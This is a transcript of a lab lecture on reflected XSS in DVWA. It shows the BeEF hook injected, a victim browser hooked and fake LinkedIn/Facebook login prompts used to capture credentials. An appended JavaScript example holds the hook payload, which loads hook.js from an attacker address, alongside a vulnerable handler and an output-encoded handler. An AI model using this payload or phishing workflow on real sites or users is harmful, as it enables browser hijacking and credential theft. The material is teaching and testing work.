1 00:00:00,060 --> 00:00:08,070 All right, everyone, this session is about the real hacking; we'll be hacking our Windows 2 00:00:08,070 --> 00:00:15,780 10 machine, a victim Windows 10 machine, and in this session we'll be making use of the BeEF tool. 3 00:00:16,110 --> 00:00:23,340 And as for the vulnerable website, it's going to be DVWA for this instance; for this lab 4 00:00:23,610 --> 00:00:28,330 we'll be making use of some more labs as well, like bWAPP and some others as well. 5 00:00:28,350 --> 00:00:32,630 But for this session, we'll be making use of Damn Vulnerable Web Application. 6 00:00:32,850 --> 00:00:33,180 All right. 7 00:00:33,990 --> 00:00:35,720 So let's get started with BeEF. 8 00:00:36,360 --> 00:00:40,260 So if you remember the lab correctly, we have three elements. 9 00:00:40,620 --> 00:00:43,380 First, we have BeEF running on Kali. 10 00:00:43,830 --> 00:00:47,130 Second, we have the machine that runs on Windows 10. 11 00:00:47,400 --> 00:00:49,920 And third, we need the vulnerable website. 12 00:00:50,250 --> 00:00:53,560 That is a part of OWASP BWA. 13 00:00:53,560 --> 00:00:55,050 Wait, that's DVWA. 14 00:00:56,070 --> 00:00:56,960 So let's get started. 15 00:00:56,970 --> 00:01:01,650 Let's first set up our hacking machine; on the hacking machine, 16 00:01:01,770 --> 00:01:03,210 that's Kali, basically, 17 00:01:03,660 --> 00:01:09,680 we need to start our BeEF system, the BeEF tool, first. 18 00:01:11,220 --> 00:01:11,580 Hmm. 19 00:01:13,800 --> 00:01:14,940 Where exactly is it? 20 00:01:15,350 --> 00:01:19,140 OK, sorry. 21 00:01:19,250 --> 00:01:20,430 I guess. 22 00:01:21,200 --> 00:01:23,120 Yeah, that's it. 23 00:01:23,190 --> 00:01:24,330 And did this. 24 00:01:28,700 --> 00:01:31,270 All right, so let's get started 25 00:01:31,350 --> 00:01:32,030 with BeEF. 26 00:01:34,300 --> 00:01:37,370 It would be taking some time to load the project. 27 00:01:38,650 --> 00:01:40,760 All right, and here we go.
28 00:01:41,320 --> 00:01:43,370 So the BeEF system has started. 29 00:01:43,390 --> 00:01:44,830 Let's go to the browser. 30 00:01:51,890 --> 00:02:04,230 OK, and we need to go to 127.0.0.1, then ui, I know, that's what I know, right? 31 00:02:04,850 --> 00:02:10,570 So this is where we'll be managing all the devices. 32 00:02:11,180 --> 00:02:14,760 So currently we don't have any active device at this moment. 33 00:02:15,350 --> 00:02:18,830 Let's keep it on the left-hand side. 34 00:02:20,000 --> 00:02:23,500 OK, so this would be our hacking machine; on the right 35 00:02:23,900 --> 00:02:26,570 we need our Windows 10 machine. 36 00:02:28,570 --> 00:02:40,660 All right, here it is, and you go, OK, this is our Windows 10 victim machine. 37 00:02:41,230 --> 00:02:43,210 Where will it be? 38 00:02:45,160 --> 00:02:52,870 Yeah, yeah, this is our Windows 10 machine, and we also need our DVWA. 39 00:02:53,140 --> 00:02:58,850 OK, we will not be accessing the machine, but just remember what's the IP address. 40 00:02:58,870 --> 00:03:01,880 OK, so this is pretty clear. 41 00:03:02,530 --> 00:03:03,940 What do you see on the left? 42 00:03:04,940 --> 00:03:06,420 That's our BeEF. 43 00:03:07,020 --> 00:03:09,490 What do you see on the right, up there? 44 00:03:09,560 --> 00:03:11,030 That's our victim machine. 45 00:03:11,080 --> 00:03:12,540 What do you see on the bottom? 46 00:03:13,000 --> 00:03:18,360 That's our DVWA, which is the infected website. 47 00:03:19,000 --> 00:03:19,360 All right. 48 00:03:19,360 --> 00:03:20,610 So let's get started. 49 00:03:21,970 --> 00:03:26,580 What we need first is the code, OK? 50 00:03:26,860 --> 00:03:31,060 We need to have that JavaScript code ready. 51 00:03:31,370 --> 00:03:40,950 OK, and now the first thing that we would do is, we'll be logging in from the victim machine.
52 00:03:41,440 --> 00:03:47,620 Just imagine a situation where the victim machine has got some link. 53 00:03:47,980 --> 00:03:55,630 And through that link it is sending, you know, our victim machine is sending some JavaScript, posting 54 00:03:55,630 --> 00:04:02,260 basically, or submitting some JavaScript code to the vulnerable site which is on the bottom over here. 55 00:04:02,680 --> 00:04:08,710 And we'll see if DVWA reflects that code back to the system or not. 56 00:04:08,980 --> 00:04:12,130 If yes, then it is actually affected. 57 00:04:12,130 --> 00:04:19,300 It is already vulnerable, and the system will be compromised by the attacking machine, by BeEF, and BeEF 58 00:04:19,300 --> 00:04:22,100 quickly gets access to the machine in that case. 59 00:04:22,120 --> 00:04:25,450 OK, so let's open the Explorer. 60 00:04:28,700 --> 00:04:29,220 OK. 61 00:04:29,780 --> 00:04:33,380 And after doing that, that's... 62 00:04:35,180 --> 00:04:36,890 Let's go then. 63 00:04:40,020 --> 00:04:52,620 All right, so we'll be logging in to our OWASP BWA, which is... and this is OWASP BWA, and in this there 64 00:04:52,620 --> 00:04:59,160 are multiple projects running, that is, multiple vulnerable sites; we'll be going to DVWA, which is Damn 65 00:04:59,160 --> 00:05:02,000 Vulnerable Web Application, once you go there. 66 00:05:02,010 --> 00:05:12,120 The default credentials, as I've mentioned, and then get into it; we can perform many activities with 67 00:05:12,120 --> 00:05:12,420 this. 68 00:05:13,200 --> 00:05:20,010 What is more important, what is more important as far as this session is concerned, is the XSS, 69 00:05:20,010 --> 00:05:21,400 cross-site scripting, reflected. 70 00:05:21,610 --> 00:05:24,330 OK, so this is a field, the field. 71 00:05:24,660 --> 00:05:26,600 This is a field in this directory. 72 00:05:26,610 --> 00:05:31,500 OK, well, you can quickly get to see if this is infected by yourself.
73 00:05:31,920 --> 00:05:33,790 OK, you can quickly get the idea. 74 00:05:33,790 --> 00:05:41,850 And let's see, being a user on the Windows 10 machine at this moment, if I want to see, if 75 00:05:41,850 --> 00:05:48,070 I'm submitting some JavaScript code, is it sending it back to me as it is, or is it making any changes? 76 00:05:48,750 --> 00:05:52,180 So what you can do is just submit any script. 77 00:05:53,370 --> 00:05:56,960 So let me make use of a very simple script. 78 00:05:57,540 --> 00:06:00,440 So this is the syntax, I hope you know it as of now. 79 00:06:01,050 --> 00:06:08,200 So whatever JavaScript you want to make use of in this tag, you know, this has to be enclosed with the 80 00:06:08,220 --> 00:06:10,880 script tag and with a closing script tag as well. 81 00:06:11,460 --> 00:06:18,270 And then, let's say in our case, we are just adding an alert just to give us a prompt. 82 00:06:18,390 --> 00:06:18,850 OK. 83 00:06:19,530 --> 00:06:19,970 Hello. 84 00:06:21,180 --> 00:06:29,490 And once you submit, you see this: you have submitted a script code, and is it giving it back on your 85 00:06:29,490 --> 00:06:29,940 system? 86 00:06:30,390 --> 00:06:31,800 That's the JavaScript code. 87 00:06:31,990 --> 00:06:35,240 You've got the idea that exactly this is happening. 88 00:06:35,250 --> 00:06:39,710 That means the site, this DVWA, is actually infected. 89 00:06:40,170 --> 00:06:43,230 OK, so let's submit something over here. 90 00:06:43,230 --> 00:06:44,070 Very interesting. 91 00:06:44,400 --> 00:06:51,480 What we are going to do is we'll be making use of this hook.js, OK, we'll be making use of this 92 00:06:51,480 --> 00:06:53,130 hook.js and we'll be submitting it. 93 00:06:53,160 --> 00:06:54,090 Here it is. 94 00:06:54,420 --> 00:06:54,730 Right. 95 00:06:54,750 --> 00:07:01,650 So what it means to say is, I will be making use of JavaScript to be redirected to download it,
96 00:07:01,680 --> 00:07:07,790 I mean, the site to be redirected to our BeEF system so that BeEF gets the session request. 97 00:07:08,670 --> 00:07:14,730 So what we could do is we can make use of the script tag again, the same style. 98 00:07:17,120 --> 00:07:26,930 All right, and now, because we want to add a redirection to the site, we have to specify the URL, 99 00:07:26,960 --> 00:07:37,610 so you have to start with the script tag on the first, then the next one, and the final step. 100 00:07:38,000 --> 00:07:51,020 Then the IP address, that is 10 dot 0 dot 1 dot, then, sorry, 1, then 3000, 101 00:07:51,030 --> 00:07:54,800 and then hook.js. 102 00:07:55,060 --> 00:07:55,160 Yes. 103 00:07:55,530 --> 00:08:03,380 OK, so this is pretty much what exactly it is looking for, and also keep your BeEF system open so that we 104 00:08:03,380 --> 00:08:06,140 could see any session that is coming to it. 105 00:08:06,650 --> 00:08:14,990 Let's submit and see if there's any request coming into the system; we are supposed to have some 106 00:08:14,990 --> 00:08:16,310 session coming back. 107 00:08:17,030 --> 00:08:18,760 We should have some session. 108 00:08:18,920 --> 00:08:19,450 All right. 109 00:08:19,460 --> 00:08:21,260 So that's lovely. 110 00:08:21,260 --> 00:08:23,360 The moment we hit Enter, it took some time. 111 00:08:23,360 --> 00:08:26,990 And now, what was there earlier as offline, 112 00:08:27,290 --> 00:08:29,360 now you see the same system, 113 00:08:29,380 --> 00:08:31,490 now the system is coming as online. 114 00:08:31,490 --> 00:08:36,740 You see this active system IP address is 10.1.1.6. 115 00:08:36,740 --> 00:08:46,350 If you can go here and you see the IP, sorry, I think you see this tab's 116 00:08:46,390 --> 00:08:50,650 URL, 1.36, quite it is, and 10.0.1. 117 00:08:51,560 --> 00:08:58,940 Well, that is because that's the mediator; who is the mediator? Then the DVWA,
the Damn Vulnerable Web 118 00:08:58,940 --> 00:09:02,360 Application, and the mediator, which is the requester in between. 119 00:09:02,840 --> 00:09:09,800 So if, let's say, we go here, we could even see in here, on this next tab, just after the basic details, 120 00:09:09,800 --> 00:09:15,740 the other tab, which is the requester; the requester is the mediator, which is sending the request on 121 00:09:15,740 --> 00:09:16,890 behalf of the victim. 122 00:09:17,480 --> 00:09:17,780 Right. 123 00:09:18,350 --> 00:09:22,700 So the 10.0.1, well, we get this right. 124 00:09:23,480 --> 00:09:25,160 How can it be really helpful? 125 00:09:25,840 --> 00:09:29,420 Remember this: in order to do this, we have made use of the script. 126 00:09:29,420 --> 00:09:34,160 The script can be shared on a social media platform, through any website link. 127 00:09:34,160 --> 00:09:39,890 And people go there, click on the links, and there could be hundreds of thousands of people getting compromised 128 00:09:39,890 --> 00:09:40,300 quickly. 129 00:09:40,730 --> 00:09:41,020 Right. 130 00:09:41,060 --> 00:09:42,230 That's the one thing. 131 00:09:42,530 --> 00:09:45,460 Now, let's do some nasty stuff here. 132 00:09:46,160 --> 00:09:47,480 The session is still active. 133 00:09:48,950 --> 00:09:56,240 Now, what we can do is, let's look at some of the information for this, or let me increase the size of 134 00:09:56,240 --> 00:09:56,540 this. 135 00:09:56,900 --> 00:10:01,800 And you can see, the quicker we do it, we get all the information of the system. 136 00:10:02,210 --> 00:10:08,750 OK, so the moment you go into Details, you get to see all the capabilities, what can work, 137 00:10:08,750 --> 00:10:09,550 what not. 138 00:10:10,130 --> 00:10:17,030 And you also get the information about the engines, what is the operating system, and everything, 139 00:10:17,030 --> 00:10:19,790 everything you can think of, resolution of the system.
140 00:10:20,150 --> 00:10:21,880 Is it a part of any virtual machine? 141 00:10:21,890 --> 00:10:23,900 Yes, it is detected as a virtual machine. 142 00:10:23,930 --> 00:10:25,640 Even you can see over here as well. 143 00:10:25,970 --> 00:10:30,320 It is coming in from a virtual machine; then Logs, Commands and everything. 144 00:10:30,960 --> 00:10:33,970 What we are really interested in is the Commands. 145 00:10:33,980 --> 00:10:34,250 Right. 146 00:10:34,700 --> 00:10:41,810 So what we are going to do is, we'll be, you know, in this case, we'll try to phish this user, or we'll 147 00:10:41,810 --> 00:10:48,740 try to hack maybe his LinkedIn account, or maybe his Instagram account, or maybe his Facebook account, and 148 00:10:48,740 --> 00:10:55,340 how exactly we are going to do that is by grabbing those username and password, the credentials basically. 149 00:10:55,340 --> 00:10:59,630 Let's say we want to get access to his LinkedIn account. 150 00:10:59,630 --> 00:11:02,090 We want to hack his account for sure. 151 00:11:02,660 --> 00:11:07,040 In that case, you can click on Social Engineering in the Commands section. 152 00:11:07,220 --> 00:11:08,870 You can see there are multiple options. 153 00:11:08,870 --> 00:11:16,760 I'll be taking this, because this way you get the real-world idea about how those accounts got 154 00:11:17,150 --> 00:11:18,650 compromised, and how it basically happened. 155 00:11:18,920 --> 00:11:21,350 You see multiple options are available. 156 00:11:22,370 --> 00:11:25,160 You would see multiple options are basically being available. 157 00:11:25,460 --> 00:11:32,600 And every feature, those take you to the user interface; every feature has a different 158 00:11:33,140 --> 00:11:33,950 color to it. 159 00:11:34,220 --> 00:11:39,620 What you see in green basically indicates it is exploitable and undetectable.
160 00:11:39,860 --> 00:11:44,180 If you try it, that user will not know what exactly is happening. 161 00:11:44,390 --> 00:11:48,770 And it is completely, it can, it is completely hackable or exploitable. 162 00:11:49,210 --> 00:11:55,850 What you see in the orange color, that indicates that it works for the target, but 163 00:11:55,850 --> 00:11:57,500 it can be detected as well. 164 00:11:57,620 --> 00:12:04,070 You know, and what you see in the other color, maybe red, is something which is not going to work in 165 00:12:04,070 --> 00:12:05,000 that situation. 166 00:12:05,420 --> 00:12:07,280 There could be some gray color as well. 167 00:12:07,280 --> 00:12:10,460 If you go in more detail, there could be some... 168 00:12:10,760 --> 00:12:11,150 Yeah. 169 00:12:11,270 --> 00:12:12,740 So you see this gray color. 170 00:12:12,740 --> 00:12:16,270 It indicates that it's not yet verified, so 171 00:12:17,190 --> 00:12:21,120 not even BeEF is sure that it would really work. 172 00:12:22,140 --> 00:12:28,200 Let's try some, accordingly, by type or something, so you can go to Social Engineering, and over there 173 00:12:28,200 --> 00:12:33,450 you will find Pretty Theft, and there you can just try making use of, 174 00:12:33,450 --> 00:12:39,030 yeah, we can try making use of any sort of commands; I made use of just Facebook. 175 00:12:39,360 --> 00:12:46,860 You can execute it, or probably you can make use of it, and probably I have already tried some. 176 00:12:47,440 --> 00:12:53,370 So what you can do is you can make use of any of such commands, or you can make a new one as well. 177 00:12:53,670 --> 00:12:57,090 So what I could do is probably...
178 00:13:01,010 --> 00:13:08,900 Yeah, so let's say I want to get access to the LinkedIn account in this case, so let me select 179 00:13:08,900 --> 00:13:15,710 LinkedIn; you can select what the background is and all the same kind of stuff, and then you 180 00:13:15,710 --> 00:13:19,040 can define what would be the URL, a custom logo and everything. 181 00:13:19,040 --> 00:13:23,240 So you can select what would be the defined or your desired logo. 182 00:13:23,240 --> 00:13:25,380 In that case, you can execute it. 183 00:13:26,030 --> 00:13:32,170 OK, so the moment you do that, you see on the right-hand side this is what is coming up this time; 184 00:13:32,180 --> 00:13:38,330 you can, you know, it could be any website; it might ask you, you know, in order to get 185 00:13:38,330 --> 00:13:39,310 access to the site. 186 00:13:39,650 --> 00:13:42,110 Well, I have, you have considered DVWA, right? 187 00:13:42,120 --> 00:13:48,860 It could be any kind of site which might ask you to log in with your Facebook or Instagram account 188 00:13:48,860 --> 00:13:51,020 or LinkedIn account to get access to the system. 189 00:13:51,020 --> 00:13:51,220 Right. 190 00:13:51,650 --> 00:13:53,020 So that can be done as well. 191 00:13:53,390 --> 00:13:59,720 We can even try with any other stuff, maybe a YouTube account, or maybe it's a Facebook account, so we 192 00:13:59,720 --> 00:14:03,500 can try doing the Facebook one; we can try executing it as well. 193 00:14:03,500 --> 00:14:05,570 And it will be taking effect. 194 00:14:06,350 --> 00:14:12,290 You can try limiting to one feature, and you can try executing many other features as well. 195 00:14:12,290 --> 00:14:22,740 Accordingly, once the feature has been executed, let's say in this case we made use of LinkedIn, 196 00:14:23,980 --> 00:14:29,870 OK, and we put the password, like user test and test. 197 00:14:31,340 --> 00:14:32,420 You just sign in. 198 00:14:32,850 --> 00:14:33,280 Okay.
199 00:14:33,830 --> 00:14:37,490 And the moment the user signs in, we get the command results. 200 00:14:38,480 --> 00:14:42,710 So we get the command result as this: test and test. 201 00:14:42,710 --> 00:14:43,040 Right. 202 00:14:43,070 --> 00:14:48,150 So this is something which we can keep trying, and we'll get the result about it. 203 00:14:48,420 --> 00:14:57,020 So this is what's the deal: when you keep going with it, you try to get more and more information 204 00:14:57,020 --> 00:14:58,710 about each individual feature. 205 00:14:59,270 --> 00:15:05,090 So this is like, for every command you can execute all those features. 206 00:15:05,090 --> 00:15:05,360 Right. 207 00:15:05,660 --> 00:15:11,390 So you can do it for Facebook, you can do it for LinkedIn, or maybe you can customize it yourself and 208 00:15:11,390 --> 00:15:12,950 then execute that. 209 00:15:12,950 --> 00:15:16,160 And the prompt will come up for the user; the end user types 210 00:15:16,650 --> 00:15:20,030 his desired, actually, ID and password. 211 00:15:20,510 --> 00:15:22,340 For him it would be invalid. 212 00:15:23,300 --> 00:15:29,380 It will say it's an invalid password; for us it would be the command results that come to us. 213 00:15:29,400 --> 00:15:29,670 Right. 214 00:15:30,500 --> 00:15:32,840 So that's how we can keep trying it. 215 00:15:32,840 --> 00:15:39,350 And we get more information about what exactly is happening on the system at this moment of time. 216 00:15:39,680 --> 00:15:46,850 I hope you got the sense about how to make use of a command, or probably for, if anything, maybe 217 00:15:46,860 --> 00:15:49,490 LinkedIn, Facebook or any sort of stuff. 218 00:15:49,490 --> 00:15:55,650 As you have seen, this is available for, you know, this is available for many of the commands, 219 00:15:55,650 --> 00:16:01,090 so you can try it at LinkedIn, Facebook, Windows, IE and everything as well.
220 00:16:02,150 --> 00:16:08,690 This was for learning purposes, and beware whenever you try this. 221 00:16:08,690 --> 00:16:18,860 And remember this: the browsers like Chrome, Microsoft Edge, keep, you know, keep the other 222 00:16:18,860 --> 00:16:20,660 security patches updated, 223 00:16:20,900 --> 00:16:26,960 so that you can overcome this kind of vulnerability, which can be exploited by BeEF. 224 00:16:27,110 --> 00:16:34,580 So there could be a situation where such a command doesn't work on Chrome, in some situation, 225 00:16:34,580 --> 00:16:35,990 or maybe Microsoft IE, 226 00:16:35,990 --> 00:16:38,690 well, I mean, Microsoft Edge. 227 00:16:38,870 --> 00:16:45,410 Well, and if there are some victim machines which are not updated, it is definitely going to work. 228 00:16:45,410 --> 00:16:50,990 But for some of the systems it might not work as well, if those are running an up-to-date system. 229 00:16:50,990 --> 00:16:51,410 All right. 230 00:16:51,710 --> 00:16:58,850 So I hope you got the idea about how to hook JavaScript to the system, how to 231 00:16:58,850 --> 00:17:02,060 send some, you know, a blog, 232 00:17:02,060 --> 00:17:07,340 I mean, a login box as well, for the user, maybe for different accounts. 233 00:17:07,820 --> 00:17:09,020 I hope you got the idea. 234 00:17:09,020 --> 00:17:10,280 We'll get you in the next session. 235 00:17:10,280 --> 00:17:10,760 Thank you.
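Added example, not part of the lecture transcript and not code from BeEF or DVWA: a small JavaScript model of the reflection test the lecture performs. It first submits the harmless alert probe, then the BeEF hook tag, against a handler that concatenates the parameter the way DVWA's reflected-XSS page does, and beside it the output-encoded handler that stops the hook from being reflected. The attacker address 10.0.0.1:3000, the parameter name and both handler functions are assumptions made for the example; replace the address with your own Kali/BeEF address.

```javascript
// Added example (assumed setup, not the lecture's or BeEF's own code).
// Assumption: BeEF is listening on this Kali address; change it to yours.
const ATTACKER = "10.0.0.1:3000";

// Payloads used in the lecture: a harmless probe, then the BeEF hook tag.
const PROBE = "<script>alert('Hello')</script>";
const HOOK  = `<script src="http://${ATTACKER}/hook.js"></script>`;

// Vulnerable handler: mirrors a "low" reflected-XSS page that drops the
// request parameter straight into the HTML response.
function vulnerableGreeting(name) {
  return `<pre>Hello ${name}</pre>`;
}

// HTML-encode the five characters that matter inside an element body.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: same page, but untrusted text is encoded before output.
function safeGreeting(name) {
  return `<pre>Hello ${escapeHtml(name)}</pre>`;
}

// The lecture's reflection test: does the payload come back verbatim?
function isReflectedUnescaped(response, payload) {
  return response.includes(payload);
}

// What a hooked browser would fetch: every external <script src=...> in the page.
function externalScriptSources(html) {
  const sources = [];
  const re = /<script\s+[^>]*src=["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

// Run both payloads through both handlers and report what each one reflects.
function runDemo() {
  return {
    vulnProbe: isReflectedUnescaped(vulnerableGreeting(PROBE), PROBE),
    vulnHook: externalScriptSources(vulnerableGreeting(HOOK)),
    safeProbe: isReflectedUnescaped(safeGreeting(PROBE), PROBE),
    safeHook: externalScriptSources(safeGreeting(HOOK)),
  };
}

console.log(runDemo());
```

The check only reports whether the submitted text comes back unencoded in the HTML body, which is exactly what the alert probe in the lecture shows; when it does, the hook tag loads hook.js from the attacker's address and the browser appears in the BeEF panel. Keeping the browser patched, as the lecture advises, limits which BeEF command modules succeed afterwards, but it does not stop the reflection itself; server-side output encoding as in safeGreeting does.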